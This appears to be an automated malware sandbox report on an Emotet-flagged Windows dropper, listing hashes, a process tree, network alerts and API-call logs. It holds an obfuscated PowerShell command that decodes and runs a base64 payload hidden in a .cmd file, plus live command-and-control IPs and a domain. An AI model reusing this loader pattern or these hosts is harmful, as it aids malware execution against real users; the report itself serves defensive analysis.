Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	April 21, 2025, 10 a.m.	April 21, 2025, 12:55 p.m.

Size	2.1MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`29e24525c83a49e30fc532e59f769b09`
SHA256	`c060719a3c3396dd56bf96418110513abd36346e6ccb0c53b441b002178d909a`
CRC32	`70095037`
ssdeep	`49152:12IWq19Dofd2p7bM0HzsugjCWNWV92qqW5XTw6dSbix3trUq:xNEfd2p77zsN89Tj5XE6djx3h`
PDB Path	wextract.pdb
Yara	PE_Header_Zero - PE File Signature Malicious_Library_Zero - Malicious_Library Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet CAB_file_format - CAB archive file IsPE32 - (no description) UPX_Zero - UPX packed file

download.php "C:\Users\test22\AppData\Local\Temp\download.php"
884
- 1w99u4.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\1w99u4.exe
  2076
  - namez.exe "C:\Users\test22\AppData\Local\Temp\f1e82329e5\namez.exe"
    2252
    - hvof1h0.exe "C:\Users\test22\AppData\Local\Temp\10076070101\hvof1h0.exe"
      2836
      - hvof1h0.exe "C:\Windows\Temp\{3C00F4D4-05FB-4560-8F0E-1E24C5F0A8D1}\.cr\hvof1h0.exe" -burn.clean.room="C:\Users\test22\AppData\Local\Temp\10076070101\hvof1h0.exe" -burn.filehandle.attached=304 -burn.filehandle.self=312
        2932
    - 7cde3a8044.exe "C:\Users\test22\AppData\Local\Temp\10076080101\7cde3a8044.exe"
      3024
    - LAc2heq.exe "C:\Users\test22\AppData\Local\Temp\10076090101\LAc2heq.exe"
      1232
    - Hmcm0Oj.exe "C:\Users\test22\AppData\Local\Temp\10076100101\Hmcm0Oj.exe"
      2360
    - xztOH3r.exe "C:\Users\test22\AppData\Local\Temp\10076110101\xztOH3r.exe"
      1156
    - eZp5zCz.exe "C:\Users\test22\AppData\Local\Temp\10076120101\eZp5zCz.exe"
      1692
    - cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\test22\AppData\Local\Temp\10076141121\690BRuM.cmd"
      2200
      - cmd.exe Cmd.ExE /c StARt /mIn PoWERsheLL -w H -C "Iex([SySTeM.TEXT.eNCoDiNg]::UTf8.getStrIng([SYsTEm.convERt]::FroMBASE64stRINg(($iLrRl=[SYStEM.Io.fILe]::REAdALlteXt('C:\Users\test22\AppData\Local\Temp\10076141121\690BRuM.cmd')).substrInG($iLrRl.lENgtH - 3155928))))"
        2796
        
        powershell.exe PoWERsheLL -w H -C "Iex([SySTeM.TEXT.eNCoDiNg]::UTf8.getStrIng([SYsTEm.convERt]::FroMBASE64stRINg(($iLrRl=[SYStEM.Io.fILe]::REAdALlteXt('C:\Users\test22\AppData\Local\Temp\10076141121\690BRuM.cmd')).substrInG($iLrRl.lENgtH - 3155928))))"
        2788
    - i5Kz53x.exe "C:\Users\test22\AppData\Local\Temp\10076150101\i5Kz53x.exe"
      3056
    - 235T1TS.exe "C:\Users\test22\AppData\Local\Temp\10076160101\235T1TS.exe"
      2028
- 2W7420.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\2W7420.exe
  2296
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
paguehojebrasil.shop	A 147.79.84.176	147.79.84.176

IP Address	Status	Action
147.79.84.176	Active	Moloch
164.124.101.2	Active	Moloch
185.215.113.41	Active	Moloch
185.215.113.59	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 185.215.113.59:80 -> 192.168.56.103:49166	2400031	ET DROP Spamhaus DROP Listed Traffic Inbound group 32	Misc Attack
TCP 185.215.113.59:80 -> 192.168.56.103:49166	2060969	ET MALWARE Amadey CnC Response	Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 147.79.84.176:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.103:49168 -> 147.79.84.176:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.103:49168 -> 147.79.84.176:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49175 -> 147.79.84.176:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.103:49175 -> 147.79.84.176:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.103:49175 -> 147.79.84.176:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49167 -> 147.79.84.176:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.103:49167 -> 147.79.84.176:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.103:49167 -> 147.79.84.176:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49180 -> 147.79.84.176:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.103:49180 -> 147.79.84.176:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.103:49182 -> 147.79.84.176:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.103:49182 -> 147.79.84.176:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.103:49182 -> 147.79.84.176:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49183 -> 147.79.84.176:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.103:49183 -> 147.79.84.176:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.103:49183 -> 147.79.84.176:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49170 -> 147.79.84.176:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.103:49170 -> 147.79.84.176:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.103:49174 -> 147.79.84.176:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.103:49174 -> 147.79.84.176:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.103:49174 -> 147.79.84.176:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49184 -> 147.79.84.176:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.103:49184 -> 147.79.84.176:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.103:49178 -> 147.79.84.176:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.103:49178 -> 147.79.84.176:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 185.215.113.41:80 -> 192.168.56.103:49186	2400031	ET DROP Spamhaus DROP Listed Traffic Inbound group 32	Misc Attack
TCP 192.168.56.103:49178 -> 147.79.84.176:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49176 -> 147.79.84.176:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.103:49176 -> 147.79.84.176:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.103:49179 -> 147.79.84.176:443	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 192.168.56.103:49179 -> 147.79.84.176:443	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.103:49179 -> 147.79.84.176:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49186 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49186	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.41:80 -> 192.168.56.103:49186	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49186	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49204 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49206 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49206	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.41:80 -> 192.168.56.103:49206	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49206	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49204	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.41:80 -> 192.168.56.103:49204	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49204	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49206 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49208 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49208	2014819	ET INFO Packed Executable Download	Misc activity
TCP 185.215.113.41:80 -> 192.168.56.103:49208	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.41:80 -> 192.168.56.103:49208	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49208	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49208	2015744	ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity
TCP 192.168.56.103:49218 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49218	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.41:80 -> 192.168.56.103:49218	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49218	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49186 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49218 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49218	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49218	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49222 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49222	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.41:80 -> 192.168.56.103:49222	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49222	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49218 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49208 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49210 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49210	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.41:80 -> 192.168.56.103:49210	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49210	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49210 -> 185.215.113.41:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 147.79.84.176:443 -> 192.168.56.103:49182	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49182	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49180	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49180	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49167	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49167	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49178	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49178	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49168	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49168	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49175	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49175	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49183	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49183	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49179	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49179	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49176	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49176	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49184	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49184	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49170	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49170	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49174	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49174	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode

Suricata TLS

No Suricata TLS

Queries for the computername (4 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 21, 2025, 10:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2025, 10:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2025, 10:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 21, 2025, 10:02 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (32 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 21, 2025, 10 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:01 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:01 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:01 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:01 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:01 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:01 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:01 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:01 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:01 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:01 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:01 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:01 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:01 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:01 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:01 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:02 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:02 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:02 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:02 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:02 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:02 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:02 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:02 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:02 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:02 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:02 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:02 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:02 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:02 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:02 a.m.			0	0
IsDebuggerPresent April 21, 2025, 10:02 a.m.			0	0

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW April 21, 2025, 10:02 a.m.	buffer: Processing -WindowStyle 'H' failed: Cannot convert value "H" to type "System.Diagnostics.ProcessWindowStyle" due to invalid enumeration values. Specify one of the following enumeration values and try again. The possible enumeration values are "Normal, Hidden, Minimized, Maximized". console_handle: 0x0000001f	1	1	0

Uses Windows APIs to generate a cryptographic key (15 events)

Time & API	Arguments	Status	Return
CryptExportKey April 21, 2025, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0047acd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0047ae18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0047ae18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0047ae18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0047a618 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0047a618 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0047a618 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0047a618 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0047a618 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0047a618 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0047ae18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0047ae18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0047ae18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0047ae18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 21, 2025, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0047ae18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

This executable has a PDB path (1 event)

pdb_path

wextract.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 21, 2025, 10:01 a.m.		1	1	0

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

AVI

One or more processes crashed (50 out of 243 events)

Time & API	Arguments	Status
__exception__ April 21, 2025, 10 a.m.	stacktrace: RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: fb e9 4e 01 00 00 60 8b 74 24 24 8b 7c 24 28 fc exception.symbol: 2w7420+0x2ff0b9 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 3141817 exception.address: 0x15ef0b9 registers.esp: 4062884 registers.edi: 0 registers.eax: 1 registers.ebp: 4062900 registers.edx: 24690688 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb e9 63 06 00 00 58 33 14 24 31 14 24 33 14 24 exception.symbol: 2w7420+0x60dd8 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 396760 exception.address: 0x1350dd8 registers.esp: 4062848 registers.edi: 1971192040 registers.eax: 28282 registers.ebp: 4010274836 registers.edx: 19857408 registers.ebx: 3 registers.esi: 20254105 registers.ecx: 1971388416	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb e9 88 04 00 00 89 e6 81 c6 04 00 00 00 57 bf exception.symbol: 2w7420+0x612ce exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 398030 exception.address: 0x13512ce registers.esp: 4062852 registers.edi: 1971192040 registers.eax: 4294941760 registers.ebp: 4010274836 registers.edx: 234729 registers.ebx: 3 registers.esi: 20282387 registers.ecx: 1971388416	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 55 57 e9 fa 04 00 00 81 c4 04 00 00 00 56 52 exception.symbol: 2w7420+0x61f51 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 401233 exception.address: 0x1351f51 registers.esp: 4062848 registers.edi: 1971192040 registers.eax: 31721 registers.ebp: 4010274836 registers.edx: 234729 registers.ebx: 20258215 registers.esi: 20282387 registers.ecx: 1514122494	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb e9 d7 fc ff ff ba 5a ee fb 7b 31 54 24 04 5a exception.symbol: 2w7420+0x6279c exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 403356 exception.address: 0x135279c registers.esp: 4062852 registers.edi: 1259 registers.eax: 31721 registers.ebp: 4010274836 registers.edx: 234729 registers.ebx: 20261440 registers.esi: 20282387 registers.ecx: 0	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 29 f6 ff 34 0e ff 34 24 e9 b5 f9 ff ff 58 81 exception.symbol: 2w7420+0x1d1761 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 1906529 exception.address: 0x14c1761 registers.esp: 4062852 registers.edi: 20293856 registers.eax: 29706 registers.ebp: 4010274836 registers.edx: 376832 registers.ebx: 376832 registers.esi: 21761791 registers.ecx: 21791970	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb e9 25 fc ff ff ff 0c 24 e9 2e 02 00 00 35 f6 exception.symbol: 2w7420+0x1d15be exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 1906110 exception.address: 0x14c15be registers.esp: 4062852 registers.edi: 20293856 registers.eax: 29706 registers.ebp: 4010274836 registers.edx: 604292951 registers.ebx: 376832 registers.esi: 4294939964 registers.ecx: 21791970	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 0c 24 55 bd 6b ee ff 7c exception.symbol: 2w7420+0x1d7891 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 1931409 exception.address: 0x14c7891 registers.esp: 4062848 registers.edi: 21818087 registers.eax: 30178 registers.ebp: 4010274836 registers.edx: 1539368458 registers.ebx: 21786705 registers.esi: 21818103 registers.ecx: 0	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb 51 b9 38 4f ff 7d 50 b8 01 58 b7 3b e9 44 00 exception.symbol: 2w7420+0x1d7a5c exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 1931868 exception.address: 0x14c7a5c registers.esp: 4062852 registers.edi: 21818087 registers.eax: 30178 registers.ebp: 4010274836 registers.edx: 1539368458 registers.ebx: 21816883 registers.esi: 21818103 registers.ecx: 0	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb e9 e8 02 00 00 5b 81 f5 69 dd df 2e 50 b8 8d exception.symbol: 2w7420+0x1d7226 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 1929766 exception.address: 0x14c7226 registers.esp: 4062852 registers.edi: 0 registers.eax: 30178 registers.ebp: 4010274836 registers.edx: 1539368458 registers.ebx: 21789543 registers.esi: 50665 registers.ecx: 0	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: fb e9 10 f8 ff ff 50 89 e0 05 04 00 00 00 e9 d0 exception.symbol: 2w7420+0x1d9789 exception.instruction: sti exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 1939337 exception.address: 0x14c9789 registers.esp: 4062852 registers.edi: 134889 registers.eax: 21825812 registers.ebp: 4010274836 registers.edx: 4294938692 registers.ebx: 132181889 registers.esi: 50665 registers.ecx: 1971442156	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 55 89 04 24 54 58 05 04 exception.symbol: 2w7420+0x1e24b9 exception.instruction: in eax, dx exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 1975481 exception.address: 0x14d24b9 registers.esp: 4062844 registers.edi: 134889 registers.eax: 1447909480 registers.ebp: 4010274836 registers.edx: 22104 registers.ebx: 1971327157 registers.esi: 21824621 registers.ecx: 20	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: 0f 3f 07 0b 64 8f 05 00 00 00 00 83 c4 04 83 fb exception.symbol: 2w7420+0x1e11e5 exception.address: 0x14d11e5 exception.module: 2W7420.exe exception.exception_code: 0xc000001d exception.offset: 1970661 registers.esp: 4062844 registers.edi: 134889 registers.eax: 1 registers.ebp: 4010274836 registers.edx: 22104 registers.ebx: 0 registers.esi: 21824621 registers.ecx: 20	1
__exception__ April 21, 2025, 10 a.m.	stacktrace: exception.instruction_r: ed 81 fb 68 58 4d 56 75 0a c7 85 d4 2a 2d 12 01 exception.symbol: 2w7420+0x1e3b08 exception.instruction: in eax, dx exception.module: 2W7420.exe exception.exception_code: 0xc0000096 exception.offset: 1981192 exception.address: 0x14d3b08 registers.esp: 4062844 registers.edi: 134889 registers.eax: 1447909480 registers.ebp: 4010274836 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 21824621 registers.ecx: 10	1
